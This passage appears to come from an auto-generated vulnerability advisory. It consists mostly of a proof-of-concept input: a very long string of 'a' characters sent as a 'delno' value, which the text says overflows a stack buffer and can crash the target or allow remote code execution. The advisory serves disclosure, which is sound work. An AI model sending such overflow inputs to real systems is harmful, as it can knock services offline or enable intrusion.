aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
```

The long `delno` value overflows the stack buffer, causing a denial of service or potentially remote code execution [ref_id=1].

Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References: 5
